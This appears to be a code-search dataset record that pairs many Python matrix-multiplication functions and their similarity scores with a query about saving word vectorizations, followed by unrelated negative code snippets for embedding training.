"def _kronecker_product(mat1: tf.Tensor, mat2: tf.Tensor) -> tf.Tensor:\n m1, n1 = mat1.get_shape().as_list()\n mat1_rsh = tf.reshape(mat1, [m1, 1, n1, 1])\n m2, n2 = mat2.get_shape().as_list()\n mat2_rsh = tf.reshape(mat2, [1, m2, 1, n2])\n return tf.reshape(mat1_rsh * mat2_rsh, [m1 * m2, n1 * n2])",
"def _mul(*args):\n\treturn functools.reduce(numpy.dot, args)",
"def matrix_mul(m_a, m_b):\n if not isinstance(m_a, list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b, list):\n raise TypeError(\"m_b must be a list\")\n if len(list(filter(lambda i: not isinstance(i, list), m_a))) > 0:\n raise TypeError(\"m_a must be a list of lists\")\n if len(list(filter(lambda i: not isinstance(i, list), m_b))) > 0:\n raise TypeError(\"m_b must be a list of lists\")\n if m_a is None or m_a == [] or m_a == [[]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b is None or m_b == [] or m_b == [[]]:\n raise ValueError(\"m_b can't be empty\")\n for r in m_a:\n for v in r:\n if not isinstance(v, (int, float)):\n raise ValueError(\"m_a should contain only integers or floats\")\n for r in m_b:\n for v in r:\n if not isinstance(v, (int, float)):\n raise ValueError(\"m_b should contain only integers or floats\")\n if max(map(lambda i: len(i), m_a)) != min(map(lambda i: len(i), m_a)):\n raise TypeError(\"each row of m_a must be of the same size\")\n if max(map(lambda i: len(i), m_b)) != min(map(lambda i: len(i), m_b)):\n raise TypeError(\"each row of m_b must be of the same size\")\n try:\n w = (len(m_a) + (0, 1)[len(m_a) == 1])\n m_c = [(['x'] * w) for b in range(len(m_b[0]))]\n for i in range(len(m_a)):\n for j in range(len(m_b[0])):\n s = 0\n for k in range(len(m_a[0])):\n s += (m_a[i][k] * m_b[k][j])\n m_c[i][j] = s\n return list(filter(lambda r: r != (['x'] * w), m_c))\n except:\n raise ValueError(\"m_a and m_b can't be multiplied\")",
"def __mul__(left, right):\n \n if isinstance(left, Plucker) and isinstance(right, Plucker):\n # reciprocal product\n return np.dot(left.uw, right.v) + np.dot(right.uw, left.v)\n elif isinstance(left, Plucker) and arg.ismatrix(right, (4,None)):\n return left.skew @ right; # postmultiply by 4xN",
"def matrixMultiply(a, colsA, b, colsB):\r\n\trowsA = len(a)\r\n\trowsB = len(b)\r\n\r\n\t# rowsA x colsA ... rowsB x colsB \r\n\tassert rowsA == colsB, \"matrix dimensions not fit for multiplication\"\r\n\r\n\t# result size: rowsA x colsB\r\n\tr = rowsA * [None]\r\n\tfor i in range(rowsA):\r\n\t\tr[i] = colsB * [None]\r\n\t\tfor j in range(colsB):\r\n\t\t\t\tr[i][j] = sum( a[i][k]* b[k][j] for k in range(colsA))\r\n\treturn r",
"def StrassenMatrixM(a, b):\r\n if len(a) != 2 or len(a[0]) != 2 or len(b) != 2 or len(b[0]) != 2:\r\n raise Exception('Matrices should be 2x2!')\r\n print(a[0][0] * b[0][1] + a[0][1] * b[1][1])\r\n matrix = [[a[0][0] * b[0][0] + a[0][1] * b[1][0], a[0][0] * b[0][1] + a[0][1] * b[1][1]],\r\n [a[1][0] * b[0][0] + a[1][1] * b[1][0], a[1][0] * b[0][1] + a[1][1] * b[1][1]]]\r\n\r\n return matrix",
"def matmul(A, B):\n\n A._check('*', B, A.shape[1], B.shape[0])\n return A.from_rep(A.rep.matmul(B.rep))",
"def __matmul__(self, other):\n return F.MatMul.apply(self, other)",
"def matrix_product(mat1: List[List[int]], mat2: List[List[int]]):\n if len(mat1) == 0 or len(mat2) == 0:\n raise ValueError(\"One of matrix is empty\")\n n, k1 = len(mat1), len(mat1[0])\n k2, m = len(mat2), len(mat2[0])\n if k1 != k2:\n raise ValueError(\n f\"Can't multiply two matrices with shapes {n}x{k1} and {k2}x{m}\"\n )\n mat2_t = matrix_transpose(mat2)\n return [[vec_product(vec1, vec2) for vec2 in mat2_t] for vec1 in mat1]",
"def transforms_multiply(t0s, t1s):\r\n \r\n return ut.matrix_multiply(t0s, t1s)",
"def matrix_multiplication_loop(x_matrix, y_matrix):\n result = []\n for i, row in enumerate(x_matrix):\n row_vector = []\n for j in range(len(y_matrix[0])):\n product = 0\n for k in range(len(row)):\n product += x_matrix[i][k] * y_matrix[k][j]\n row_vector.append(product)\n result.append(row_vector)\n return result",
"def matrixMultiplication(self, n, id, context):\n\n print(\"id: {}\".format(id))\n # Create one matrix\n f = 1\n m1 = []\n for x in range(n):\n row = []\n for y in range(n):\n row.append(f)\n f = f + 1\n m1.append(row)\n # The second matrix is equal to the first matrix\n m2 = m1\n print(\"m2: {}\".format(m2))\n\n # Multiply matrices\n m3 = []\n for i in range(n):\n row = []\n for j in range(n):\n sum = 0\n for k in range(n):\n sum = sum + m1[i][k] * m2[k][j]\n row.append(sum)\n m3.append(row)\n\n sum = 0\n # add the entries\n for i in range(n):\n for j in range(n):\n sum = sum + m3[i][j]\n\n print(\"Result of multiplication is {}\".format(sum))\n return sum",
"def matmul(x, y):\n return np.matmul(x, y)",
"def calculate_matmul(mat_a, mat_b):\n assert mat_a.shape[-2] == 1 and mat_b.shape[-1] == 1\n return tf.reduce_sum(tf.squeeze(mat_a, -2) * tf.squeeze(mat_b, -1), axis=2, keepdims=True)",
"def matrix_multiply(x, y):\r\n\r\n # handle the base case of receiving\r\n # two empty matrices\r\n if x == [] and y == []:\r\n return []\r\n\r\n # determine the number of rows and columns in the result matrix\r\n num_rows = len(x)\r\n num_cols = len(y[0])\r\n\r\n num_cross = len(x[0])\r\n\r\n # initialize the result matrix\r\n result_matrix = [[0] * num_cols for _ in xrange(num_rows)]\r\n\r\n # compute the values for each cell of the result\r\n # matrix\r\n for row_index in xrange(num_rows):\r\n for col_index in xrange(num_cols):\r\n\r\n # sum up the corresponding values from\r\n # x and y\r\n for multiplication_index in xrange(num_cross):\r\n\r\n x_value = x[row_index][multiplication_index]\r\n y_value = y[multiplication_index][col_index]\r\n\r\n result_matrix[row_index][col_index] += x_value * y_value\r\n\r\n return result_matrix",
"def kronecker_product(mat1, mat2):\n m1, n1 = mat1.get_shape().as_list()\n mat1_rsh = tf.reshape(mat1, [m1, 1, n1, 1])\n m2, n2 = mat2.get_shape().as_list()\n mat2_rsh = tf.reshape(mat2, [1, m2, 1, n2])\n return tf.reshape(mat1_rsh * mat2_rsh, [m1 * m2, n1 * n2])",
"def __mul__(self, other):\n if isinstance(other, Vector):\n # Matrix vector product\n v = Vector(list())\n for n in range(len(other.vectors)):\n v += scale(other.vectors[n][n], self.vectors[n])\n return v\n elif isinstance(other, Matrix):\n # Matrix matrix product\n if self.n != other.m:\n raise ValueError(\"Wrong fucking sizes, nøøb\")\n\n selfVectors = self.vectors\n selfColVectors = self.transpose()\n otherVectors = other.vectors\n otherColVectors = other.transpose()\n vectors = list()\n for col in range(other.n):\n cordinator = []\n\n for row in range(self.m):\n coord = 0\n\n for k in range(other.m):\n coord += (\n selfVectors[row].coords[k]\n * otherColVectors.vectors[col].coords[k]\n )\n\n cordinator.append(coord)\n\n v = Vector(cordinator)\n vectors.append(v)\n matrix = Matrix(vectors)\n matrix = matrix.transpose()\n return matrix\n elif isinstance(other, int) or isinstance(other, float): # Skalering af matrix\n for i in range(len(self.vectors)):\n self.vectors[i] *= other\n else:\n raise ValueError(\n \"Can only multiply Matrix with Matrix, Vector, Integer or Float\"\n )",
"def multiply(a, b):\n columns_of_a = len(a[0])\n lines_of_b = len(b)\n if columns_of_a != lines_of_b:\n # Check matrix dimensions\n print \"Incompatible sizes!\"\n else:\n lines_of_a = len(a)\n columns_of_b = len(b[0])\n #C = []\n #for i in range (lines_of_a):\n # C.append(columns_of_b * [0])\n c = [columns_of_b * [0] for i in range(lines_of_a)]\n for i in range(lines_of_a):\n for j in range(columns_of_b):\n for k in range(lines_of_b):\n c[i][j] += a[i][k] * b[k][j]\n return c",
"def power_matrix(A, k):\n nrow = np.shape(A)[0]\n A0 = np.identity(nrow) \n for k in range(q):\n A0 = np.dot(A0, A)\n \n return A0",
"def __mul__(self, other):\n return Matrix3(\n self.i * other,\n self.j * other,\n self.k * other,\n )",
"def matrix_mult(A,B,mod=10**9+7):\n C = [[1,1],[1,1]]\n C[0][0] = ((A[0][0]*B[0][0])%mod + (A[0][1]*B[1][0])%mod)%mod\n C[0][1] = ((A[0][0]*B[0][1])%mod + (A[0][1]*B[1][1])%mod)%mod\n C[1][0] = ((A[1][0]*B[0][0])%mod + (A[1][1]*B[1][0])%mod)%mod\n C[1][1] = ((A[1][0]*B[0][1])%mod + (A[1][1]*B[1][1])%mod)%mod\n return C",
"def __mul__(self, scalar):\n m, n = self.shape\n scalar = mpfr(scalar)\n data = dict()\n for i in range(m):\n for j in range(n):\n data[i, j] = self[i, j] * scalar\n return MPMatrix((m, n), data)",
"def Matrix(arg0: List[List[complex]]) -> ngsolve.bla.MatrixC:",
"def matrix_multiply(A, B):\n # Section 1: Ensure A & B dimensions are correct for multiplication\n rowsA = len(A); colsA = len(A[0])\n rowsB = len(B); colsB = len(B[0])\n if colsA != rowsB:\n raise ArithmeticError(\n 'Number of A columns must equal number of B rows.')\n\n # Section 2: Store matrix multiplication in a new matrix\n C = zeros_matrix(rowsA, colsB)\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C",
"def _z2matmul(self, left, right):\n prod = np.mod(np.dot(left, right), 2)\n return prod",
"def matmul(A, B):\n # type: (Optional[Tensor], Tensor) -> Tensor\n if A is None:\n return B\n if is_sparse(A):\n return torch.sparse.mm(A, B)\n return torch.matmul(A, B)",
"def np_matmul(mat1, mat2):\n return np.matmul(mat1, mat2)",
"def __mul__(self, oth):\n\t\tif isinstance(oth, Matrix) or isiterable(oth):\n\t\t\t# matrix\n\t\t\toth_m = oth\n\t\t\tif not isinstance(oth_m, Matrix):\n\t\t\t\toth_m = Matrix(oth_m)\t\t\t\n\t\t\tres_m = self._mat_mul(oth_m)\n\t\t\tif isinstance(oth, Matrix):\n\t\t\t\treturn res_m\n\t\t\telse:\n\t\t\t\treturn type(oth)(res_m._unnest())\n\t\telse:\n\t\t\t# scalar\n\t\t\treturn Matrix._make_new(lambda i,j: self.data[i][j] * oth, self.rows, self.cols)",
"def matrix_add():",
"def prod_mat(self,other):\n [rs,cs],[ro,co] = self.D,other.D\n assert cs == ro, \"tailles incompatibles\"\n return Mat([rs,co], lambda i,j : prod_scal(self.ligne(i),other.col(j)))",
"def matrixMult( self, matrix0, matrix1 ):\r\n result = {}\r\n keys = sorted( set( matrix0.keys() ) )\r\n count = range( len( matrix0.keys() ) )\r\n \r\n for key in keys:\r\n result[ key ] = []\r\n for i in count:\r\n sum = 0\r\n for j in count:\r\n sum += matrix0[ key ][j] * matrix1[ keys[j] ][i]\r\n result[ key ].insert( i, sum )\r\n \r\n return result",
"def matr_prod(_A, _B):\r\n # Matrix multiplication\r\n B0 = _B[0]\r\n lenB = len(_B)\r\n lenA = len(_A)\r\n if(len(_A[0]) != lenB): # Check matrix dimensions \r\n Exception('Matrices have wrong dimensions')\r\n if(isinstance(B0, list) or isinstance(B0, array) or isinstance(B0, tuple)): #_B is matrix\r\n lenB0 = len(B0)\r\n C = [[0 for row in range(lenB0)] for col in range(lenA)]\r\n for i in range(lenA):\r\n for j in range(lenB0):\r\n for k in range(lenB):\r\n C[i][j] += _A[i][k]*_B[k][j]\r\n else: #_B is vector\r\n C = [0 for row in range(lenB)]\r\n for i in range(lenA):\r\n for k in range(lenB):\r\n C[i] += _A[i][k]*_B[k]\r\n return C",
"def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out",
"def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out",
"def __matmul__(self, B):\n if isinstance(B, dict):\n X = self.metacopy()\n\n if B['leg'] not in X.indexes:\n raise ValueError('Leg of singular values not an indexes '\n 'of self')\n\n if B['symmetries'] != X.symmetries:\n raise ValueError('Not same symmetries')\n\n x, y = X.coupling_id(B['leg'])\n for k in self:\n newshape = [1] * len(self[k].shape)\n newshape[X.indexes.index(B['leg'])] = -1\n X[k] = self[k] * B[k[x][y]].reshape(newshape)\n\n return X\n\n connections = self.connections(B)\n if not connections:\n raise ValueError(f'No connections found between {self} and {B}')\n\n return self.contract(B, (list(connections),) * 2).simplify()",
"def Mult(A, B, C_, IM, M):\n for i in range(M):\n for j in range(M):\n for k in range(M):\n C_[i, j] = A[i, j] * B[i, j]",
"def matrixPowers(S,K):\n # S can be either a single GSO (N x N) or a collection of GSOs (E x N x N)\n if len(S.shape) == 2:\n N = S.shape[0]\n assert S.shape[1] == N\n E = 1\n S = S.reshape(1, N, N)\n scalarWeights = True\n elif len(S.shape) == 3:\n E = S.shape[0]\n N = S.shape[1]\n assert S.shape[2] == N\n scalarWeights = False\n\n # Now, let's build the powers of S:\n thisSK = np.tile(np.eye(N, N).reshape(1,N,N), [E, 1, 1])\n SK = thisSK.reshape(E, 1, N, N)\n for k in range(1,K):\n thisSK = thisSK @ S\n SK = np.concatenate((SK, thisSK.reshape(E, 1, N, N)), axis = 1)\n # Take out the first dimension if it was a single GSO\n if scalarWeights:\n SK = SK.reshape(K, N, N)\n\n return SK",
"def __mul__(self, othertr):\n res = self.dot(othertr)\n return res",
"def build_M(K, R, T):\n external = np.append(R, T, axis=1)\n M = K.dot(external)\n return M",
"def naive_multiply(a, b):\n m = len(a) # Number of rows in first matrix\n k = len(b) # Number of rows in the second matrix\n res = []\n p = len(b[0])\n n = k\n for q in range(m):\n res.append([0])\n for q in range(m):\n for w in range(p - 1):\n res[q].append(0)\n for i in range(m):\n for j in range(p):\n for r in range(n):\n res[i][j] = a[i][r] * b[r][j] + res[i][j]\n return res",
"def __matmul__(self, other):\n if isinstance(other, types.Vector):\n return self.apply(target=other)\n if isinstance(other, MatrixLieGroup):\n return self.multiply(other=other)\n else:\n assert False, \"Invalid argument\"",
"def matrix_mul(m_a, m_b):\n if not isinstance(m_a, list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b, list):\n raise TypeError(\"m_b must be a list\")\n if not all(isinstance(lst, list) for lst in m_a):\n raise TypeError(\"m_a must be a list of lists\")\n if not all(isinstance(lst, list) for lst in m_b):\n raise TypeError(\"m_b must be a list of lists\")\n if m_a in [[], [[]]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b in [[], [[]]]:\n raise ValueError(\"m_b can't be empty\")\n if not all(all(isinstance(i, (int, float)) for i in lst) for lst in m_a):\n raise TypeError(\"m_a should contain only integers or floats\")\n if not all(all(isinstance(i, (int, float)) for i in lst) for lst in m_b):\n raise TypeError(\"m_b should contain only integers or floats\")\n if not all(len(i) == len(m_a[0]) for i in m_a):\n raise TypeError(\"each row of m_a must be of the same size\")\n if not all(len(i) == len(m_b[0]) for i in m_b):\n raise TypeError(\"each row of m_b must be of the same size\")\n if not len(m_a[0]) == len(m_b):\n raise ValueError(\"m_a and m_b can't be multiplied\")\n new_matrix = [[0 for i in m_b[0]] for j in m_a]\n for i in range(len(m_a)):\n for j in range(len(m_b[0])):\n for k in range(len(m_b)):\n new_matrix[i][j] += m_a[i][k] * m_b[k][j]\n return new_matrix",
"def _generate_mult_process(X, mat, inits):\n M = np.empty_like(X, dtype=float)\n M[..., 0] = inits[X[..., 0]]\n M[..., 1:] = mat[X[..., :-1], X[..., 1:]]\n np.cumprod(M, axis=-1, out=M)\n return M",
"def __mul__(self, other):\n if hasattr(other, 'as_homogenous_transformation'):\n return basis(homogenous_transformation = self.as_homogenous_transformation() * other.as_homogenous_transformation())\n elif hasattr(other, 'n'):\n if other.n == (3,1):\n b = matrix.col((other[0], other[1], other[2], 1))\n elif other.n == (4,1):\n b = other\n else:\n raise TypeError(b, \"Incompatible matrices\")\n p = self.as_homogenous_transformation() * b\n if other.n == (3,1):\n return matrix.col(p[0:3])\n else:\n return p\n else:\n raise TypeError(b)",
"def matrix_multiply(self, Am, Bm):\r\n # Section 1: Ensure A & B dimensions are correct for multiplication\r\n rowsA = len(Am)\r\n colsA = len(Am[0])\r\n rowsB = len(Bm)\r\n colsB = len(Bm[0])\r\n if colsA != rowsB:\r\n raise ArithmeticError(\r\n 'Number of A columns must equal number of B rows.')\r\n \r\n # Section 2: Store matrix multiplication in a new matrix\r\n C = self.zeros_matrix(rowsA, colsB)\r\n for i in range(rowsA):\r\n for j in range(colsB):\r\n total = 0\r\n for ii in range(colsA):\r\n total += Am[i][ii] * Bm[ii][j]\r\n C[i][j] = total\r\n \r\n return C",
"def matmul(x, y):\n if len(list(y.size())) == 2:\n # if one of them is a vector (i.e. wanting to do MV mult)\n z = torch.zeros(2, x.size()[1], dtype=torch.double, device=x.device)\n z[0] = torch.mv(x[0], y[0]) - torch.mv(x[1], y[1])\n z[1] = torch.mv(x[0], y[1]) + torch.mv(x[1], y[0])\n\n if len(list(y.size())) == 3:\n z = torch.zeros(\n 2, x.size()[1], y.size()[2], dtype=torch.double, device=x.device\n )\n z[0] = torch.matmul(x[0], y[0]) - torch.matmul(x[1], y[1])\n z[1] = torch.matmul(x[0], y[1]) + torch.matmul(x[1], y[0])\n\n return z",
"def np_matmul(mat1, mat2):\n return mat1.dot(mat2)",
"def __mul__(self, other):\n\n # Scalar multiplication\n if isinstance(other, (int, long, float, complex)):\n return Matrix(self.rows, self.columns, [other * x for x in self.data])\n\n if not issubclass(type(other), Matrix):\n raise TypeError(type(other))\n\n if self.columns != other.rows:\n raise ValueError(\"Undefined multiplication for these matrices\")\n\n result = []\n for i in range(1, self.rows + 1):\n row = self.row(i)\n result.extend([dot_product(row, other.column(j)) for j in range(1, other.columns + 1)])\n\n return Matrix(self.rows, other.columns, data = result)",
"def add_matrices(x, y):\n return [[x[i][j] + y[i][j] for j in range(len(x[0]))] for i in range(len(x))]",
"def __mul__(self, otherMatrix):\n if not (len(self.array[0]) == len(otherMatrix.array)):\n raise ArithmeticError\n\n common = len(self.array[0])\n X = len(self.array)\n Y = len(otherMatrix.array[0])\n newArray = [[0 for x in range(X)] for x in range(Y)]\n\n for row in range(X):\n for col in range(Y):\n for elem in range(common):\n newArray[row][col] += self.array[row][elem] * otherMatrix.array[elem][col]\n\n\n return matrix(newArray)",
"def multiply(A, B):\n\n if len(A[0]) != len(B):\n raise Exception(\"Matrix dimensions do not match for matrix multiplication: %d x %d and %d x %d\" % (len(A), len(A[0]), len(B), len(B[0])))\n\n result = [[0] * len(B[0]) for i in range(len(A))]\n\n for i in range(len(A)):\n for j in range(len(B[0])):\n\n result[i][j] = LinAl.dot(A[i], LinAl.transpose(B)[j])\n\n return result"
] | [
"0.7083097",
"0.6831898",
"0.6822807",
"0.68104607",
"0.6706873",
"0.66786253",
"0.66484094",
"0.6619107",
"0.659644",
"0.6510616",
"0.6500125",
"0.6498091",
"0.646012",
"0.6443269",
"0.64374197",
"0.6424422",
"0.6419277",
"0.6410198",
"0.6350263",
"0.63494116",
"0.6345248",
"0.6341108",
"0.63231075",
"0.6322469",
"0.6286912",
"0.6279721",
"0.6270186",
"0.6250742",
"0.6244857",
"0.62315214",
"0.6208925",
"0.61732364",
"0.6170745",
"0.61680555",
"0.615464",
"0.61394155",
"0.61233646",
"0.61019397",
"0.61018956",
"0.60954624",
"0.60831",
"0.6079774",
"0.606879",
"0.60664666",
"0.60564154",
"0.60237706",
"0.6014748",
"0.60130584",
"0.60092235",
"0.6007997",
"0.6006538",
"0.6003757",
"0.60027164",
"0.5999643",
"0.59973115",
"0.5979641",
"0.59624714",
"0.5958996",
"0.59564877",
"0.5934897",
"0.592905",
"0.5922551",
"0.58877975",
"0.58867604",
"0.5877621",
"0.58702695",
"0.58642983",
"0.58578616",
"0.5848654",
"0.58278143",
"0.5821224",
"0.5821215",
"0.5821157",
"0.58206546",
"0.5815967",
"0.58113545",
"0.58075273",
"0.5792783",
"0.5791152",
"0.5790032",
"0.5783455",
"0.5782268",
"0.5782268",
"0.577817",
"0.57645005",
"0.5763715",
"0.57578486",
"0.5754772",
"0.5745149",
"0.5740874",
"0.57352144",
"0.57315266",
"0.57303876",
"0.5726309",
"0.5714294",
"0.5701747",
"0.57011247",
"0.5698666",
"0.56968075",
"0.56846"
] | 0.70788336 | 1 |
Exports generated vectorization dictionary for future use | def save(self, dirname=None):
self.genio.save(dirname)
logging.info(
f'Saved word vectorizations for {dirname}') | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def create_vector_dict(self):\n return self.MOVE_DATA",
"def create_vector_dict(self):\n return self.MOVE_DATA",
"def getVectors(self):\n vectors = dict()\n i = 0\n N = len(self.db.invertedIndex)\n for w, (idf, docs) in self.db.invertedIndex.items():\n for doc, tf in docs.items():\n try:\n vectors[doc][i] = tf * idf\n except KeyError as k:\n vectors[doc] = {i: tf * idf}\n i += 1\n i = 0;\n return vectors",
"def finalize_output_dict(self):\n self.output_dict = {\n key: torch.cat(value).numpy() for key, value in self.output_dict.items()\n }",
"def _vector_mapping(self) -> dict:\n words = set()\n for file in os.listdir(self.processed_path):\n doc_path = f\"{self.processed_path}/{file}\"\n with open(doc_path, 'r') as f:\n text_words = f.readline().split()\n words = words.union(set(text_words))\n words = list(words)\n words.sort()\n\n return dict(zip(words, range(len(words))))",
"def as_dict(self):\r\n return {self.words[i]: self.vectors[i] for i in range(self.n)}",
"def test_export(self):\n\n v = Vector({ 'x': 3 })\n e = v.to_array()\n self.assertEqual(v.attributes, Vector.from_array(e).attributes)\n self.assertEqual(v.dimensions, Vector.from_array(e).dimensions)\n self.assertEqual(v.__dict__, Vector.from_array(e).__dict__)",
"def test_export_attributes(self):\n\n v = Vector({ 'x': 3 }, { \"y\": True })\n e = v.to_array()\n self.assertEqual(v.attributes, Vector.from_array(e).attributes)\n self.assertEqual(v.__dict__, Vector.from_array(e).__dict__)",
"def generate(self) -> Dict[str, Any]:\n raise NotImplementedError",
"def evaluate(out_dict, n):\n out = dict()\n for key, entry in out_dict.items():\n out[key] = dict()\n for it_count, data in entry.items():\n total = 0.\n count = 0\n for x_list in data.values():\n total += analytic_value_VaR(x_list[-1])\n count += 1\n out[key][it_count] = total / count\n np.save('normal_out_all_cvar_%d.npy' % n, out)\n print(out)",
"def finalize_output_dict(self, output_dict):\n return {key: output_dict[key].cpu().numpy() for key in output_dict.keys()}",
"def featurize(vector,features):\n dictionary = collections.defaultdict(lambda:0)\n for feature in iter(set(features)):\n dictionary[feature] = [vector[key][feature] if feature in vector[key] else 0 for key in vector] #populates vectors with zeroes where there's no value in an industry for an n-gram.\n return dictionary",
"def vector_to_dict(self, vector, original_dictionary):\n new_dictionary = {}\n current_index = 0\n for key,item in original_dictionary.items():\n new_index = current_index + item.size\n new_dictionary[f'{key}'] = np.reshape(vector[current_index:new_index],item.shape)\n current_index = new_index\n return new_dictionary",
"def vectorize(dic, keyset, section):\n vector = np.array([])\n key_len = 0\n for key in keyset:\n # To be rewritten!\n if section == 'postags':\n if key in dic[section]:\n vector = np.append(vector, du.to_vector(dic[section][key]))\n else:\n vector = np.append(vector, [0]*13) # hardcoded value\n else: # section == 'rels'\n if key in dic[section]:\n vector = np.append(vector, du.to_vector(dic[section][key]))\n else:\n vector = np.append(vector, [0]*14) # hardcoded value\n return vector",
"def smp_dict():\n out = base_dict()\n out['mro']['current'] = ['Sample']\n out['name']['current'] = 'Sample'\n ao(out, 'idx', 'Integer', attr=['Hidden'])\n ao(out, 'ii', 'Integer', attr=['Hidden'])\n ao(out, 'initialDimension', 'Float', 0., name='Initial Dimension')\n return out",
"def __getitem__(self, index):\r\n \r\n row = self._target_df.iloc[index]\r\n\r\n vector_dict = self._vectorizer.vectorize(row.source_language, row.target_language)\r\n\r\n return {\"x_source\": vector_dict[\"source_vector\"], \r\n \"x_target\": vector_dict[\"target_x_vector\"],\r\n \"y_target\": vector_dict[\"target_y_vector\"], \r\n \"x_source_length\": vector_dict[\"source_length\"],\r\n \"x_source_mltm_vector\": vector_dict[\"x_source_mltm_vector\"]}",
"def get_dict(self):\n return {key: value for key, value in zip(self._words, self._vecs)}",
"def init_output_dict(self):\n return {\n \"outputs\": torch.FloatTensor(),\n \"pred_probs\": torch.FloatTensor(),\n \"labels\": torch.LongTensor(),\n }",
"def unit_vectors(self):\n # return {'comp1': CartesianRepresentation(...),\n # 'comp2': CartesianRepresentation(...),\n # 'comp3': CartesianRepresentation(...)}\n raise Exception(\"Not yet implemented\")",
"def generate_var_dict(target_dir, target_file, skia_arch_type, have_neon,\n have_mips_dspr2, have_mips_dspr1, gyp_source_dir):\n result_file = android_framework_gyp.main(target_dir, target_file,\n skia_arch_type, have_neon,\n have_mips_dspr2, have_mips_dspr1,\n gyp_source_dir)\n var_dict = vars_dict_lib.VarsDict()\n gypd_parser.parse_gypd(var_dict, result_file, '.')\n android_framework_gyp.clean_gypd_files(target_dir)\n print '.',\n return var_dict",
"def auxiliary(dict_):\n dict_['AUX'] = {}\n if dict_['DIST']['coeff'] == [0.0] * len(dict_['DIST']['coeff']):\n is_deterministic = True\n else:\n is_deterministic = False\n\n for key_ in ['UNTREATED', 'TREATED', 'COST', 'DIST']:\n if key_ in ['UNTREATED', 'TREATED', 'COST']:\n dict_[key_]['all'] = dict_[key_]['coeff']\n dict_[key_]['all'] = np.array(dict_[key_]['all'])\n else:\n dict_[key_]['all'] = dict_[key_]['coeff']\n dict_[key_]['all'] = np.array(dict_[key_]['all'])\n\n # Number of covariates\n num_covars_out = len(dict_['TREATED']['all'])\n num_covars_cost = len(dict_['COST']['all'])\n\n dict_['AUX']['num_covars_out'] = num_covars_out\n dict_['AUX']['num_covars_cost'] = num_covars_cost\n\n # Number of parameters\n dict_['AUX']['num_paras'] = 2 * num_covars_out + num_covars_cost + 2 + 2\n\n # Starting values\n dict_['AUX']['init_values'] = []\n\n for key_ in ['TREATED', 'UNTREATED', 'COST', 'DIST']:\n dict_['AUX']['init_values'] += dict_[key_]['all'].tolist()\n\n for j in sorted(dict_[key_].keys()):\n if j in ['all', 'types']:\n pass\n else:\n del dict_[key_][j]\n dict_['DETERMINISTIC'] = is_deterministic\n dict_ = check_types(dict_)\n\n return dict_",
"def load_vector_dictionary():\n return read_word2vecs_from_file(VECTOR_FILE)",
"def feature_dist_func_dict():\n return {\"tanimoto_dissimilarity\": tanimoto_dissimilarity}",
"def generate_visualization_dict(self):\n self._data = {}\n self._data['name'] = self.name\n self._data['type'] = self.__repr__()\n self._data['color'] = self._color_rgb\n\n try:\n self._data['simulation_matrix'] = \\\n self._visualization_matrix.tolist()\n\n except:\n #Not sure which error to call here.\n raise RuntimeError('''Please call the numerical\n transformation methods,\n before generating simulation dict ''')\n\n\n return self._data",
"def export(self, outpath):\n fout = open(outpath, \"w\")\n\n # Header takes the guesswork out of loading by recording how many lines, vector dims\n fout.write(str(self.n_words) + \" \" + str(self.n_dim) + \"\\n\")\n for token in self.id2word:\n vector_components = [\"%.6f\" % number for number in self[token]]\n vector_as_string = \" \".join(vector_components)\n\n out_line = token + \" \" + vector_as_string + \"\\n\"\n fout.write(out_line)\n\n fout.close()",
"def _create_model_out_dictkeys():\r\n model_names = []\r\n result_keys = []\r\n for model_name in model_zoo._ModelZooUrls.CONFIG_PATH_TO_URL_SUFFIX.keys():\r\n try:\r\n print(model_name, \":\")\r\n select_model(model_name)\r\n result = get_features_by_image_path(\"./sample.jpg\")\r\n model_names.append(model_name)\r\n result_keys.append(list(result.keys()))\r\n except RuntimeError as t:\r\n print(t)\r\n\r\n pd.DataFrame(list(zip(model_names, result_keys))).to_csv(\"d2_model_out_dictkeys.csv\")",
"def create_data_vector(self,regression_out_dict={},phage_file=None,\n k_cutoff=0.00):\n\n self.data_vector = []\n self.seq_strings = []\n\n # If the user specifies a human-readable file, use that rather than the\n # input dictionary.\n if phage_file != None:\n \n with open(phage_file) as data:\n\n next(data)\n for line in data:\n try:\n num, seq, k_glob, theta_glob, k_ind, theta_ind = line.split()\n except ValueError:\n num, seq, k_ind, k_min, k_max = line.split()\n\n if float(k_ind) > k_cutoff:\n\n self.seq_strings.append(seq)\n\n self.data_vector.append(\n np.array([self._alphabet_dict[s] for s in seq],\n dtype=self.internal_type))\n\n else:\n for k in regression_out_dict.keys():\n if regression_out_dict[k][0] > k_cutoff:\n self.seq_strings.append(k)\n self.data_vector.append(\n np.array([self._alphabet_dict[s] for s in k],\n dtype=self.internal_type))\n\n self.data_vector = np.array(self.data_vector)\n self.seq_strings = np.array(self.seq_strings)",
"def dump_vecs():\n v_file = os.path.join(TMP_DIR, 'vectorizer.pickle')\n d_file = os.path.join(TMP_DIR, 'dectorizer.pickle')\n f_file = os.path.join(TMP_DIR, 'freq.pickle')\n \n with open(v_file, 'wb') as f:\n pickle.dump(VECTORIZER, f)\n with open(d_file, 'wb') as f:\n pickle.dump(CECTORIZER, f)",
"def construct_dict(self):\n i = 0\n self.word2idx = dict()\n fi = open(self.config.word_vec_fi_glove, 'r')\n\n for line in fi:\n self.word2idx[line.split(\" \")[0]] = i\n i += 1\n\n self.vocab_size = i\n self.write_dict()\n fi.close()",
"def createDict( self ):\n self.d = {}\n self.d['comp1'] = compensation_channel('comp1', 0, (-479.0, -10.0))\n self.d['comp2'] = compensation_channel('comp2', 1, (-479.0, -10.0))\n self.addCalibration()",
